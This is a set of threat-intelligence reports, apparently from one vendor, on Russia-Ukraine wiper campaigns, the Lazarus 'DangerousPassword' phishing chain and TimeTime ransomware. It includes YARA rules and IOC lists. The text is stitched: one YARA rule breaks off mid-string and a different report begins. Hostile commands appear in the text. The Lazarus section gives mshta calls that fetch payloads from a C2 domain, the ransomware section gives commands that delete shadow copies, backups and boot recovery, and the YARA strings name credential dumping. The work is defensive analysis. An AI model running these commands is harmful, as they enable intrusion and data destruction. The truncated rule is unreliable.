As per our Cyber Threat Intelligence Team Ukraine is being targeted with fake translation software by the suspected threat actor UAC-0056 aka SaintBear. The threat actor has been observed to be deploying Cobalt Strike, GrimPlant, and GraphSteel.

We believe that UAC-0056 was behind the WhisperGate activity which impacted the Ukrainian government agencies. As per our research, the threat actor was perhaps building on the GrimPlant and GraphSteel campaign since December 2021.

Post the compromise of the target organization, the GraphSteel variant will execute a set of reconnaissance and credential harvesting commands.

[ 15 March 2022, Version 5]
In line with CYFIRMA’s Cyber Security Predictions for 2022, the world is witnessing ongoing hybrid warfare against nations and their critical infrastructure. The Russia-Ukraine crisis head started with a plethora of cyberattacks with data wiping malware being used as a potent tool against Ukraine.

The newest malware observed in this chain is “CaddyWiper”. This malware is designed to wipe data across the Windows domains it is deployed on. What makes it different from the other malware is the tactic used by the attackers to maintain access inside the compromised networks of organizations they hit while still heavily disturbing operations by wiping other critical devices. For this to happen – the wiper malware used the DsRoleGetPrimaryDomainInformation() function to check if a device is a domain controller. If so, the data on the domain controller will not be deleted.

While the CaddyWiper does not share any similarity with the other wiper malware used before Russia’s physical invasion of Ukraine – it is quite similar to the HermeticWiper deployments. A sample analysis of this malware shows that just like the Hermetic Wiper, CaddyWiper was being deployed via GPO. This means that the attackers had control of the target’s network beforehand.

[ 14 March 2022, Version 4]
Like any global conflict, the Russia-Ukraine crisis too has opened the doors of exploits for opportunistic threat actors. This pattern of exploiting the existing public sentiments for financial gains is not new among cybercriminals – and has been witnessed during several global crises including the Covid-19 pandemic.

Our Cyber Threat Intelligence has observed a meteoric rise in the use of phishing emails as the primary attack vector to further execute scams and deliver malicious malware (including, but not limited to Remote Access Trojans/ RAT). Especially several Business Email Compromise (BEC) campaigns have been witnessed since the Russian invasion. Most of these emails use commodity malware such as Remcos RAT to deliver malevolent payloads which are distributed in large quantities across the target threat landscape. This is also the time that threat actors are exploiting existing vulnerabilities in Microsoft Office for malware implant. For instance, CVE-2017-11882 – a “Microsoft Office Memory Corruption Vulnerability” – has been successfully leveraged by cybercriminals to run arbitrary code.

[ 04 March 2022, Version 3]
As Russia bombs major Ukrainian cities, more intel on the symphony of cyberattacks that took place before the invasion has emerged. Our threat intelligence team has observed the use of a new data wiper malware named “IsaacWiper” – which they believe was part of Russian sabotage arsenal and has been deployed on Ukrainian government infrastructure (that were not attacked by HermeticWiper).

While the first incidence of IsaacWiper was observed on the 24th of February, there is substantial evidence that a new version of the data wiper was dropped on February 25th. Based on our hypothesis, the second version of the malware was suspected to be used as the threat actors failed to wipe off part of the target infrastructure. The log messages were added to keep a grip of how the malware interacted with the attacked asserts.

Apart from IsaacWiper, researchers have also found new samples signed under Hermetica Digital Limited and named them as HermeticWizard. This malware works on finding the machines connected to the local networks and moves on to gathering local IP addresses. The end goal seems to be dropping and executing the HermeticWiper malware.

Furthermore, our threat intelligence team has also identified additional TTPs of Conti Ransomware being leveraged in the ongoing conflict.

[ 02 March 2022, Version 2]
Patriotic Emotions Gets the Better of Conti Ransomware Group

The announcement of the “full support” to the Russian invasion of Ukraine by the notorious Conti Ransomware Group – seems to have ruffled some patriotic emotions among a member of the gang or a security researcher with Ukrainian origin.

The end result? 3 days after the attack on Ukraine, a new Twitter account named “Contileaks” emerged on the 27th of February. The account – suspected created by a pro-Ukraine member of the ransomware group – in an effort towards “Glory to Ukraine” has leaked what our threat intelligence team regards as precious classified information. This data not only gives an inner glimpse of Conti’s workings since January 29, 2021 – but explosive TTPs which can be leveraged by several cybercriminal groups in the upcoming months.

[ 26 February 2022, Version 1]
Objective: Unauthorized Access, Cyber Espionage, Data Exfiltration, Payload Delivery, Defense Evasion, Defacement, Hybrid Warfare.

Type of Attack: Spear-Phishing, Impersonation, Malware Implant/ Data Wiper Malware, Smishing, BGP Hijacking, DDoS (Distributed Denial-of-Service), Vulnerabilities & Exploits (October CMS).

Target Technology: Microsoft Windows, Linux, Web Applications.

Target Geography: Ukraine, Global.

Target Industry: Government, Defence, Utilities, Energy, Transportation Infrastructure, Diversified Financials, Critical Infrastructure.

Suspected Vulnerability Leveraged: CVE-2021-32648 (CVSS Score: 9.1).

Suspected Threat Actors: Gamaredon, Ghostwriter, MuddyWater, Unknown Russian Threat Actors.

Malware: WhisperGate, HermeticWiper.

Business Impact Analysis: Data Loss, Operational Disruption, Reputational Damage, Geopolitical Risk.

Reported Date: February 26, 2022.

SUMMARY: As this article is being written, Russia has officially declared war on Ukraine. Ukraine which has been for years a testing ground for cyberweaponry has now turned into a textbook case of how cyberattacks can be used to launch hybrid warfare.

While cyber offensive and use of state-sponsored threat actors are not new for both Russia and Ukraine (can be traced back to 2005), the recent cocktail of attacks launched by Russian Intelligence before formally declaring this invasion further highlights how geopolitical issues can snowball into a crippling effect on critical infrastructure and state machinery.

Recent Cyber Escalations in Ukraine:
Since October 2021, our cyber threat intelligence team has observed a trail of spear-phishing campaigns targeting organizations and entities connected with Ukrainian affairs – ranging from government agencies, defense bodies, judiciary, moving on to NGOs and humanitarian aid bodies.

These campaigns were tracked down to be cyber-espionage operations launched by Gamaredon, aimed at exfiltrating sensitive data, gaining access to critical infrastructure, maintaining persistence, and following it up with lateral movement.

Linked to Russia’s domestic intelligence service (FSB), Gamaredon resorted to remote template injection to evade detections as well as control how and when will the malicious components in the phishing emails will be delivered. It was observed that the attachments to these emails carried first-stage payloads which when downloaded can execute further payloads. The initial staging capabilities include (but are not limited to) obfuscated VBScripts, obfuscated PowerShell commands, LNK files, and self-extracting archives.

While the clarity on multiple subsequent staging scripts is limited, there is a fair possibility staging VBScripts were deployed for defense evasion and to execute Command-&-Control (C2) changes.

Fast-forward 2022, on January 13, a detrimental malware operation – masquerading as a ransomware attack – was observed to be targeting more than 70 websites of the Ukrainian government. While the defacement message on the websites was political in nature, the aim of the bootloader malware was to corrupt the data of the target infrastructure.

According to researchers, this three-stage Master Boots Record (MBR) wiper malware belongs to a new malware family named WhisperGate. They also observe that the Log4j vulnerability was leveraged to launch this attack. While the modus operandi of WhisperGate seems to resonate with VOODOO BEAR’s NotPetya malware, researchers observe no technical intersection between the two.

Though no clear attribution was made in this attack, Ukrainian officials did suspect Ghostwriter – a Belarusian threat actor group – to be responsible for this attack.

Around the same time, a vulnerability in the OctoberCMS (CVE-2021-32648) was leveraged by threat actors to gain access into the network of Ukrainian government websites. The vulnerability is caused by a flaw in the October/system package. By sending a specially crafted request, an attacker could exploit this vulnerability to request an account password reset and then gain access to the account.

As per our threat intelligence team, the vulnerability exists due to a weak password recovery mechanism. The CWE is CWE-640, CWE-287 and the vulnerability has an impact on confidentiality and integrity.

It was the breach of the Belarus Railway’s computer systems by the hacktivists, which brought in a real-world kinetic attack angle to previous cyber offensive activities. The group not only gained access to the railways’ control systems which could enable them to shut down systems – leading to several accidents.

This series of cyberattacks reached its high point when on the 23rd of February, a new series of malware samples were observed to be making inroads in Ukrainian infrastructure. This new malware, named HermeticWiper – based on the signature used in the digital certificate – was found to be a custom-written application, aiming (just like WhisperGate) to deploy a wiper targeting Windows-based devices and also manipulating the MBR for resultant boot failure. The attack exploits a benign partition management driver to further execute sabotage operations.

The DDoS attack launched using HermeticWiper, not only targeted the government websites and government contractors but also impacted the financial organizations in Ukraine and other member nations of NATO.

Note: As a retaliation to the cyber-kinetic attacks on Ukraine, the hacking group Anonymous Collective claims to have declared war on the Russian government.

Hypothesis:
We believe that these series of activities are a classic case of how cyberattacks can be used to build a smokescreen around political propaganda. By the virtue of being well-incorporated into Western Europe’s internet network as well as with the West, Ukraine provides the perfect backdoor entry into the rest of Europe as well as cyberattacks at a global level.

We expect similar long-term politically motivated cyberattacks as the newest addition in the global warfare weaponry.

While the kinetic attack on Ukraine is being witnessed at the global level, our threat intelligence team is closely monitoring the activities in the underground forums and dark web. With claims by random threat actors around the data leak of sensitive US personnel information – as retaliation to its support to Ukraine – we expect the dark web and underground forums to remain active with such spoils in the forthcoming days.

As per our threat intelligence team the ongoing Russia-Ukraine conflict can spill over and cause the following impact:

  • Threat to the Physical Security of Ukraine: As the military offensive between the two countries continues, there is a huge possibility that the Russian troops would work towards capturing Kyiv – the capital city of Ukraine – to possibly establish a proxy government favouring Russia.
  • Escalated Cyber Attacks: Attacks in cyberspace, the digital world would continue to see an uptick with both the sides and its allies targeting each other, the organizations and their subsidiaries/vendors/partners with ransomware attacks, Wiper malware, DDOS attacks, and more to cause operational disruption, reputational damage, espionage activities.
  • Impact on Supply Chain: The ongoing conflict would impact the supply chain for many nations around the world that have ties with Ukraine and Russia for imports and exports of multiple items. The nations/organizations/individuals would have to now look for alternatives to minimize and meet expectations of the demand & supply.
  • Economic Repercussions: Due to the ongoing conflicts and dependence on the supply chain, price rise on vital items is quite expected, leading governments to rethink their plans and strategies for the coming years.
  • Anticipated Sanctions: Organizations having business/contracts with Russian organizations could be impacted due to the sanctions put in place and would find it difficult for the sale of components, sharing of technology, financial transactions, other business collaborations.
  • To conclude, the way Russia has managed to immobilize Ukraine through a series of cyberattacks is a glaring reminder of Sun Tzu’s words in “The Art of War” – often regarded as the Bible of Military Strategy – that a warring nation can gain victory by just subduing its enemy, without even engaging in a physical fight.

INSIGHTS:

  • Russian threat actors are suspected of using wiper malware to target government entities, financial institutions, investment organizations, critical infrastructure on NATO member nations, and other nations who are asserting against the recent Russian aggression on Ukraine. The threat actors are believed to be targeting these organizations with the backing of their government and intelligence agencies without carrying much on the physical location of the organizations.
  • The Russian cyberattacks are believed to be in retaliation for ongoing economic and diplomatic sanctions imposed by many nations led by the US & EU and pose a heightened risk of further escalation in the cyber world.
  • Their primary intent is to cause reputational damage to countries (and organizations from these countries) who are not in sync with their geo-political agenda, exfiltrate and wipe-out sensitive data, cause operational disruption, and name/shame entities by selling data in the grey market or to competitors for financial gains.
  • It is suspected that multiple assets have been targeted so far, and from a few assets, data has been wiped. We suspect more such vulnerable assets could be targeted in the coming days based on the development of the geopolitical situation in Europe.
  • While in the past, the Gamaredon group has heavily relied on off-the-shelf tools, as early as December 2021 it was observed that it has shifted to custom-developed malware. The group was noted to be using a novel RTF template injection technique in their phishing campaigns to retrieve malicious content from remote URLs. Apart from the recent deployment of eight custom binaries in cyber-espionage operations against Ukrainian entities; this hacking group is believed to be responsible for thousands of attacks in Ukraine since 2013.
  • As per researchers, WhisperGate consists of two samples: One appears as ransomware while the other is a beaconing implant used to deliver an in-memory Microsoft Intermediate Language (MSIL) payload. The in-memory code uses Living Off the Land Binaries (LOLBINs) to evade detection and also performs anti-analysis techniques, as it will fail to detonate when certain monitoring tools exist.

Indicators of Compromise:
Refer to the IOCs file to exercise controls on your security systems.

Targeted Recommendations:

  • Implement unified threat management and external threat landscape management strategy programs – including malware detection, deep learning neural networks, and anti-exploit technology connected with vulnerability and risk mitigation.
  • Use threat intelligence services and continue monitoring situational awareness on the emerging threats on the Ukraine crisis and its impact.
  • It is recommended that organizations and their subsidiaries with operations in Ukraine undergo a thorough review of their business continuity and resilience plans.
  • Organizations with no direct contact/ exposure to Ukraine should consider building a plan to avoid any sort of collateral damage which can arise from attacks in this region.
  • Consider alternative plans to diversify, identify supply chains that include components from Russia, Ukraine.
  • To limit & minimize the likelihood of hackers using lateral movement modules, disable PowerShell wherever possible.
  • It is recommended that organizations, regardless of the geography of their operations, incorporate Digital Risk Protection (DRP) as part of the overall security posture to proactively defend against impersonations and phishing attacks.
  • Use of network segmentation within converged IT/OT environment as a critical security control based on network type, purpose, access privileges to limit the snowball effect in an event of a compromise of a network segment.
  • Build and undertake safeguarding measures by monitoring/ blocking the IOCs and strengthening defenses based on tactical intelligence provided.
  • Configure the provided YARA rules as well as Sigma rules in your network defense mechanisms to alert attempts of cyberattacks, monitor anomalies, and restrict traffic across the network.
  • In addition to applying patches in public-facing infrastructure, organizations should:
    • Consider deploying and configuring a File Integrity Monitoring solution to monitor and/or prevent the creation of files, especially on web servers outside of maintenance windows.
    • Enable enhanced logging and implement sufficient log retention periods to support investigations, including, Microsoft Systems Monitor (Sysmon) on Windows Servers and PowerShell Module, Script Block, and Transcription Logging.
    • Most of all, employ a robust endpoint security option that will allow your IT team to identify what confidential information is being stolen, when, and through what specific channel or device.

YARA Rules
Rule 1:
rule APT_UA_Hermetic_Wiper_Feb22_1 {
meta:
description = “Detects Hermetic Wiper malware”
score = 75
hash1 = “0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da”
hash2 = “3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767”
hash3 = “2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf”
hash4 = “1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591”
strings:
$xc1 = { 00 5C 00 5C 00 2E 00 5C 00 50 00 68 00 79 00 73
00 69 00 63 00 61 00 6C 00 44 00 72 00 69 00 76
00 65 00 25 00 75 00 00 00 5C 00 5C 00 2E 00 5C
00 45 00 50 00 4D 00 4E 00 54 00 44 00 52 00 56
00 5C 00 25 00 75 00 00 00 5C 00 5C 00 2E 00 5C
00 00 00 00 00 25 00 73 00 25 00 2E 00 32 00 73
00 00 00 00 00 24 00 42 00 69 00 74 00 6D 00 61
00 70 00 00 00 24 00 4C 00 6F 00 67 00 46 00 69
00 6C 00 65 }
$sc1 = { 00 44 00 72 00 69 00 76 00 65 00 72 00 73 00 00
00 64 00 72 00 76 00 00 00 53 00 79 00 73 00 74
00 65 00 6D 00 33 00 32 }

$s1 = “\\\\?\\C:\\Windows\\System32\\winevt\\Logs” wide fullword
$s2 = “\\\\.\\EPMNTDRV\\%u” wide fullword
$s3 = “DRV_XP_X64” wide fullword
$s4 = “%ws%.2ws” wide fullword

$op1 = { 8b 7e 08 0f 57 c0 8b 46 0c 83 ef 01 66 0f 13 44 24 20 83 d8 00 89 44 24 18 0f 88 3b 01 00 00 }
$op2 = { 13 fa 8b 55 f4 4e 3b f3 7f e6 8a 45 0f 01 4d f0 0f 57 c0 }
condition:
( uint16(0) == 0x5a53 or uint16(0) == 0x5a4d ) and
filesize < 400KB and ( 1 of ($x*) or 3 of them ) } Rule 2:
rule APT_UA_Hermetic_Wiper_Artefacts_Feb22_1 {
meta:
description = “Detects artefacts found in Hermetic Wiper malware related intrusions”
score = 75
strings:
$sx1 = “/c powershell -c \”rundll32 C:\\windows\\system32\\comsvcs.dll MiniDump” ascii wide
$sx2 = “appdata\\local\\microsoft\\windows\\winupd.log” ascii wide
$sx3 = “AppData\\Local\\Microsoft\\Windows\\Winupd.log” ascii wide
$sx4 = “CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp1” ascii wide
$sx5 = “\\policydefinitions\\postgresql.exe” ascii wide

$sx6 = “powershell -v 2 -exec bypass -File text.ps1” ascii wide
$sx7 = “powershell -exec bypass gp.ps1” ascii wide
$sx8 = “powershell -exec bypass -File link.ps1″ ascii wide

/* 16 is the prefix of an epoch timestamp that shouldn’t change until the 14th of November 2023 */
$sx9 = ” 1> \\\\127.0.0.1\\ADMIN$\\__16″ ascii wide

$sa1 = “(New-Object System.Net.WebClient).DownloadFile(” ascii wide
$sa2 = “CSIDL_SYSTEM_DRIVE\\temp\\” ascii wide
$sa3 = “1> \\\\127.0.0.1\\ADMIN$” ascii wide
condition:
1 of ($sx*) or all of ($sa*)
}

Rule 3:
rule APT_UA_Hermetic_Wiper_Scheduled_Task_Feb22_1 {
meta:
description = “Detects scheduled task pattern found in Hermetic Wiper malware related intrusions”
score = 85
strings:
$a0 = “

Tracking DangerousPassword Campaign by Lazarus Group

Out-of-Band Report – Tracking DangerousPassword Campaign by Lazarus Group

 

Attack Type: Social Engineering, Spear-Phishing, Malware Implant, Persistence, Defense Evasion, Vulnerabilities & Exploits
Objective: Financial Gain
Target Industry: Finance, Cryptocurrency
Target technology: Email, Windows
Business Impact: Financial Loss, Data Loss, Customer trust and reputation damage

 

Summary

Tracking of a large-scale spear-phishing campaign dubbed “DangerousPasword” after TTPs used. This campaign was previously observed targeting cryptocurrency and financial services businesses and employees across North America, Europe, and East Asia using the CageyChameleon or CryptoCore malware.

 

Tactics, Techniques and Procedures

The initial attack vector remains social engineering via LinkedIn and spear-phishing email campaigns. Malicious documents are adjusted to specific individuals, companies, or industries.

This latest campaign leverages the LNK infection chain via double extensions. Attackers are using two ways to trick users into running their malicious files.

First is a legitimately named document with an adequately changed file type icon using *.pdf.lnk or *.xlsx.lnk double extensions. Another way is presenting ZIP or RAR archive with a decoy document and malicious *.lnk files. In order to access the content of the decoy document users are instructed to open and allow these malicious .LNK files, most commonly masked as a password file such as “password.txt.lnk”.

Once opened, mshta.exe command is executed downloading the next stage. C2 domains are using cybersquatting to mimic legitimate services looking services.

After the second stage is downloaded and executed it establishes persistence in Windows Startup with another .LNK file named to look legitimate, for example, “UserAssist.lnk”. Once persistence is established, depending on the information gathered about the system, a relevant payload for privilege escalation and lateral movement is downloaded.

Attackers seem to go to great lengths to avoid providing the malicious file to third parties other than the original target. If you receive and open the malicious file, the lifetime of the URL that mshta.exe accesses are as short as the download URL of the malicious file.

 

Sample Analysis

Filename: New Salary Adjustments. zip
MD5: 8aeba2cd6c97e43de6b8703b22a74ec5
File type: ZIP
File size: 104.42 KB (106926 bytes)

ZIP archive contains the two files below. One is a benign decoy word document, second is a malicious double extension password file.

Decoy Document

Filename: Salary Report (November 2021).docx
MD5: 76d0e527201b0d39fcbed2ceb5de51c1
File type: MS Word Document
File size: 108.00 KB (110592 bytes)

Malicious double extension password file
Filename: Password.txt.lnk
MD5: 26cb5fdcbdfccfa05399709d7dc12319
File type: Windows shortcut
File size: 2.39 KB (2445 bytes)

Upon execution .LNK file calls C2 at “datacentre[.]center” via mshta.exe and downloads second stage .LNK file

cmd.exe “C:\Windows\System32\cmd.exe” /c start /wait “dLabxpSOEVLj” C:\Users\ADMINI~1\AppData\Local\Temp\Password.txt.lnk

cmd.exe “C:\Windows\System32\cmd.exe” /q /c c^o^py C:\Windows\system32\msh*.exe C:\Users\Public\* & for %i IN (C:\Users\Public\*.exe) DO start /b %~ni.exe “hxxps://www.datacentre[.]center/SXsM+YvBTwk+ziUZc1o9S4EjzfWp16u38lm/1DfZyGA=”

mshta.exe mshta.exe “hxxps://www.datacentre[.]center/SXsM+YvBTwk+ziUZc1o9S4EjzfWp16u38lm/1DfZyGA=”

Downloaded second stage file then establishes persistence in windows startup using :Assist.lnk”

Filename: Assist.lnk
MD5: 30ced44ccc466a0f0eda10f02c369eaf
File type: Windows shortcut
File size: 806.00 B (806 bytes)

cmd.exe “C:\Windows\System32\cmd.exe” /c start /wait “SHfcJxyrTAMTXr” C:\Users\ADMINI~1\AppData\Local\Temp\Assist.lnk

mshta.exe“C:\Windows\system32\mshta.exe” hxxps://www.datacentre[.]center/9AHGT1mqmOqhCSWl5mM3MSCuQvya9TRYL/XM7lFCb9c=

 

Discovering attacker’s malicious server

When pivoting on IOCs from sample above, we have identified malicious server on IP 149.28.162[.]113 used by attacker to host multiple malicious domains serving as C2 and malware droppers.

Out of 10 domains hosted on this server 7 have been linked to other samples of same .LNK infection chain technique. Remaining 3 have different registrar and are likely to be used in a different campaign by same threat actors.

 

Domains linked to malicious samples, registrar Porkbun LLC

Onlinedocpage[.]org
Onedocshare[.]com
Gsachshr[.]com
Docusign[.]agency
Fsdriveshare[.]org
Filesaves[.]cloud
Datacentre[.]center

Unlinked domain names, registrar Tucows Domains Inc.

Trollinguneaten[.]org
Pavestonecorset[.]com
Dubbedfinally[.]link

Observed filenamesin related samples

FiCas AG Job Description.lnk
New Profits Distributions_MATT.zip
Celsius Opportunities.gdoc.rar
Exchange Project Management Plan_Q3.2021.zip
profits.docx

IOC lists (full list attached in csv format) 

DangerousPassword_IOC_list

Analyzed sample IOC list

MD5
8aeba2cd6c97e43de6b8703b22a74ec5
76d0e527201b0d39fcbed2ceb5de51c1
26cb5fdcbdfccfa05399709d7dc12319
30ced44ccc466a0f0eda10f02c369eaf

URL
https://www.datacentre[.]center/SXsM+YvBTwk+ziUZc1o9S4EjzfWp16u38lm/1DfZyGA=
https://www.datacentre[.]center/9AHGT1mqmOqhCSWl5mM3MSCuQvya9TRYL/XM7lFCb9c=

Domains
datacentre[.]center
www.datacentre[.]center

IP Adresses
149.28.162[.]113

Malicious server IOC list

MD5

3c324706e3bae0b7187b134a813011cb
42e6310ffbdd24cf9a2b5d200190359e
4b9366f2dcab60d56d09e69e21d77d91
75733ee381ee80a07cfeddc6bddd91de
791e527a2082e6207d1ac9b9b4550fdf
84dd7ccb69d0010c97c1fc336650d5e2
8b9fee7600633e4017337d5b56613a59
8ce07870c4633f40d4f53d978b0a4334
934c7b7c31d84728f0086be9b80ee1e4
a0c1ca01548be7690f2976742f068e67
adefa310e925fcbd6f8aeea3bfb68afd
b139bb873c275a61730fbcb0145aed30
bed99a09a68eb8f8b53d2a9d0ccc085a
c44d866adf8c6845b7dda742c59c6b59
d0a5e14ce27abc2fa22a6bd7f4269e88
e0d2e5a8cafdc137d4006a21a80d7c8e
dec25c57bdc8c945ba975d0f693243cb

URL

http://share.stablemarket[.]org/S1IPLKWyhI+b8SZyQi2j2+5YFP1V6BFxXAUMRERH9O0=
http://share.stablemarket[.]org/Y5qbOQiIlBomxCjPRFzyiLSvyddx/P1xM4diDmKxL3I=
https://docs.gsheetpage[.]com/oqkoB0q32czSiIjgsw+S2lfzfm4dB3TLnrpSTyuEIxI=
https://drive.cloudplus[.]one/oq6pgiji+mhzwm0jzshhfcc9j8v8l0ovb+dokurm9ui=
https://drive.cloudplus[.]one/uhrdxjlm9w/srvifnoxscv94o6rneakrszugh3vgpr4=
https://file.fsdriveshare[.]org/EzPYymF4dURi4unzpPpMUhbHH0qFEhvmksDb3WHp2nE=
https://note.onedocshare[.]com/seZlG2VYJ6l05Yn4tvYj93t9eK3OX72pIMiW95JlhDY=om/seZlG2VYJ6l05Yn4tvYj93t9eK3OX72pIMiW95JlhDY=
https://ny.silvergatehr[.]com/5Ek9724mz8oncul8Zx7E7CVDCdBNxuFFUO6pLk/PEbM=
https://ny.silvergatehr[.]com/L55Utku3f6AJR7pawBASglEHsB8GxbL22B0j1e9VwdE=
https://share.stablemarket[.]org/AUeSdfDyTf7kMvSGKlVh8K9Z1FjBuP9bJrv/Zqtwi+g=
https://share.stablemarket[.]org/S1IPLKWyhI+b8SZyQi2j2+5YFP1V6BFxXAUMRERH9O0=
https://share.stablemarket[.]org/Y5qbOQiIlBomxCjPRFzyiLSvyddx/P1xM4diDmKxL3I=
https://www.datacentre[.]center/9AHGT1mqmOqhCSWl5mM3MSCuQvya9TRYL/XM7lFCb9c=
https://www.datacentre[.]center/cb9LnI7Gx5NWKkw6wfDLQxqvKdYLqNt0HnV2tw5Zosc=
https://www.datacentre[.]center/OADS+RcTS6DtX8081Cv+0admTqzBk4Cbowz+JbpwM7o=
https://www.docusign[.]agency/jZqVFMZ9mf2WF5TkgEeGRZ2si09QqjBAcdHN46XpjRs=
https://www.docusign[.]agency/WG70GuIDhXvWk3S/fCfLkC7ZY+OrTXcMwgTMH51xNzM=
https://www.onlinedocpage[.]org/FcsDjkkPVjEsM6htE+uWxoDY7HoSX64xIHgNAoq6SF4=
https://www.onlinedocpage[.]org/sNMrUsSs7KdzaPqHi7g8lOL/6QEFrel2WwzIvO2/TEI=

Domains

datacentre.center
docusign.agency
fsdriveshare.org
gsachshr.com
ilesaves.cloud
onedocshare.com
onlinedocpage.org
filesaves.cloud

dmarc.fsdriveshare.org
doc.filesaves.cloud
docs.gsheetpage.com
drive.cloudplus.one
file.fsdriveshare.org
license.cloudplus.one
link.onlinedocpage.org
note.onedocshare.com
ny.silvergatehr.com
product.onlinedoc.dev
share.cloudmgmt.org
share.fsdriveshare.org
share.stablemarket.org
sheet.tresordocs.com
support.pilotview.cloud
www.datacentre.center
www.docusign.agency
www.gsachshr.com
www.onlinedocpage.org

Trollinguneaten.org
Pavestonecorset.com
Dubbedfinally.link
IP Adresses
149.28.162[.]113

 

ATT&CK MITRE Matrix

Technique ID Technique description Tactic description
T1055 Process Injection Privilege Escalation
T1112 Modify Registry Defense Evasion
T1218.005 Mshta Defense Evasion
T1497 Virtualization/Sandbox Evasion Defense Evasion
T1012 Query Registry Discovery
T1120 Peripheral Device Discovery Discovery

 

 

TimeTime Ransomware Technical Analysis

Risk Score: 8
Confidence Level: High.
Suspected Malware: TimeTime Malware.
Function: Ransomware.
Threat actor Associations: Unknown
First Seen: Dec 2021.

 

Brief Introduction: TimeTime ransomware is currently trending. It is written in C#.Net (C# is a general-purpose, multi-paradigm programming language) and not obfuscated in any way. After encryption, the “.timetime” extension is added to encrypted files. The ransom demand is observed to be lower compared to other ransomware groups. TimeTime ransomware wants victims to pay only €100 through Paysafecard. The ransom note “@[email protected]  and decryptor executable “@[email protected]” is dropped by the ransomware on the system. The ransomware deletes shadow volume copies and the ransomware excludes some of the folders like AppData, Windows, Common Files,  WindowsPowershell, ProgramData, Program Files from encryption.

 

TimeTime Ransomware Analysis:

File Details: As shown in Figure1 and Figure3, following are the details related to the ransomware “TimeTime”.
File Type: Windows PE-32 Executable
MD5: 8345d2b0dc8fd2134d12856557b15181
SHA256: 5ee8500fe1a2f22029908d4e2b32e7fb85aec03ffea714f3b5e82ebb2bc10f21
Subsystem: GUI
Compilation Time: 1st Aug 2069 (Fake/Suspicious)

As shown in Figure1, the malware is PE-32 bit .Net binary and is not packed (see Figure2).

Figure1

  Figure2

 

Figure3 below shows the hashes corresponding to malware and the binary has GUI subsystem and a suspicious compile time of Aug 2069 which most probably is fake. The executable is written in C#.Net.

Figure3

          

The different anti-malware solutions detected the file as malicious (see Figure4) and many of them detected as Ransomware. One anti-malware solution “Webroot” specifically relates it to “TimeTime” ransomware.

Figure4

The malware implemented the ASLR and DEP which provide hindrance during analysis.

Figure5

Figure6 and Figure7 show the sections present in the malware and the libraries/API imported by the malware and look quite normal for a .Net Binary.

Figure6

Figure7

Some of the strings as shown in Figure8 indicate the malicious functionality of the malware as it is using the command line and deleting volume shadow copies through it. The name of the malware (TimeTime) is mentioned, and the strings also indicate the functionality of encryption/decryption that may be present in the malware. So further exploration is required.

Figure8

The meta-data shows that the malware can be executed with any permission acquired by the user as shown in Figure9.

Figure9

Upon execution, the malware encrypts the files and adds the extension “.timetime” to each encrypted file as shown in Figure10. The malware also drops the ransom note .txt file with the name “@[email protected]” on Desktop and other folders containing warnings and instructions for the victim to follow.

Figure10

Figure11 shows the contents carried by ransom note dropped by the “TimeTime” ransomware on execution. It states that all of the victim’s pictures, videos, files were encrypted and lots of precious data which includes files, computer information, passwords, cookies, etc. stolen by the malware, and if the victim does not pay the ransom then all this information will be leaked on the dark web. Further, the ransom note also states that the victim should not rename encrypted files or use third-party software for decryption. The ransom note demands the amount of €100 through “paysafecard.com”. Paysafecard is a prepaid online payment method independent of bank accounts, credit cards and other usual financial systems. Customers have to buy the vouchers from local outlets and pay online by entering the code at the respective website.

Figure11

The ransom note also mentions the file “@[email protected]” which was dropped by ransomware on the desktop to decrypt files and on execution, a window pops up as shown in Figure12. On the left ““@[email protected]”  is shown which was dropped on the desktop and on the right side the pop-up window is shown which also mentions that the victim’s files are been encrypted and demand psf code to enter for decrypting files. Upon execution, the ransomware after dropping this “@[email protected]” file also executes it, and a pop-up window is displayed on the screen without user intervention.

Figure12

Figure13 below shows the process tree corresponding to malware execution. The ransomware deletes shadow volume copies by using window utilities vssadmin and wmic by executing commands “vssadmin delete shadows /all /quiet” and “wmic  shadowcopy delete” over the command prompt. The malware also executes command “bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no” to disable windows boot recovery option and command “wbadmin delete catalog -quiet” also executes to delete backup catalog to prevent victim from system recovery.

Figure13

Figure14 shows reverse-engineered code corresponding to malware and the logic is defined to execute the above-mentioned commands to delete shadow volume copies, delete the backup catalog and to disable windows boot recovery option. As per the command line argument “/x”, “/x1”, /”x2” or “/x3” passed corresponding commands will execute.

Figure14

Here in Figure16 below shows the malware initializing strings for the extension “.timetime”, ransom note file “@[email protected]” and decryptor executable file name “@[email protected]” which is further used to add an extension to the encrypted files and drops the ransom note and decryptor executable with the same name on the system.

Figure16

As shown in Figure17 below, the ransomware defined the logic to encrypt files and disks. Before encrypting files, the ransomware checks the name of the file and if it is not equivalent to “@[email protected]” and “@[email protected]” then it encrypts the file and during the encryption process “\u0001” is added to each byte.

Figure17

As shown in Figure18, the ransomware excludes some of the folders containing strings AppData, Windows, Common Files,  WindowsPowershell, Microsoft\Provisioning, ProgramData, Program Files, Cache, $ from encryption.

Figure18

Figure19 shows a snippet for registry access by the ransomware and using “safeboot” option to gain persistence and run in safeboot mode.

Figure19

The ransomware creates a new registry entry named “TimeTime” under HKCU. A new value is created each time under “HKCU\TimeTime” whenever a file has been encrypted by the ransomware (see Figure20 below).

Figure20

 

The ransomware has the following functionality/capabilities:

・Capability to collect system information.

・Synchronization capability to handle multiple processes and threads and to access shared resources.

・Capability to handle windows/GUI functions.

・Capability to search Drives, Folders.

・Capability to access registry entries and manipulate them.

・Capability to create new threads and processes.

・Ability to access registry entries and manipulation.

・Capability to sleep or deactivate when want to hide itself.

・Ability to handle, search, open, write, access files.

・Ability to encrypt files.

・Capability to handle command line arguments and command execution.

Mitre Attack Tactics and Techniques:

List of IOCs:

Recommendations:

・Implement complex password policy with renewal at regular intervals.

・Implement Multifactor Authentication policy.

・Regularly update all software on all systems, network and other devices and turn on automatic updates if possible.

・Implement Role-Based access policy and restrict it to minimal as per the requirement.

・Implement Internal threat management policy which includes training employees on the latest threats and ransomware attacks and what to do in such scenarios.

・Restrict employees’ ability to click or open suspicious/unauthorized links and files, specifically on organization devices.

・Must implement regular back-ups policy, more than one back-ups and kept one on a separate network and other isolated offline at a different place.

